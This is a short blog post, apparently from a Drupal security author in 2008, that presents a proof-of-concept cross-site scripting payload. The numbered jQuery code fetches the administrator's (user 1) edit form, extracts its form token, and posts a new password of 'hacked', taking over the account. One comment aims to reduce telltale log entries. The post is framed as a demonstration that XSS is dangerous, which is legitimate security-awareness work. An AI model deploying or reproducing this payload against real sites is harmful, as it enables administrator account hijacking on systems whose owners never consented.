Home

Update UID 1 password via JS

Mon, 14/01/2008 - 08:08 — Heine

A simple proof of concept (without <script> tags) to reset to the Administrators' password via a cross site scripting attack (XSS). Did you think XSS was harmless?

  1. // Test for  the presence of jquery.
  2. if (typeof jQuery == 'function') {
  3.   // Fetch a correct token from user/1/edit because we will need it to
  4.   // successfully submit the user edit form later.
  5.   // TODO: Include a check to increase the chance that the current user is admin,
  6.   // which will reduce the number of access denied error messages in the log.
  7.   jQuery.get('/user/1/edit',
  8.     function (data, status) {
  9.       if (status == 'success') {
  10.         // Extract the token.
  11.         var matches = data.match(/id="edit-user-edit-form-token" value="([a-z0-9]*)"/);
  12.         var token = matches[1];
  13.         // Post the minimum amount of fields. Other fields get their default values.
  14.         var payload = {
  15.           "form_id": 'user_edit',
  16.           "form_token": token,
  17.           "pass[pass1]": 'hacked',
  18.           "pass[pass2]": 'hacked'
  19.         };
  20.         jQuery.post('/user/1/edit', payload);
  21.       }
  22.     }
  23.   );
  24. }

Average: 5 (5 votes)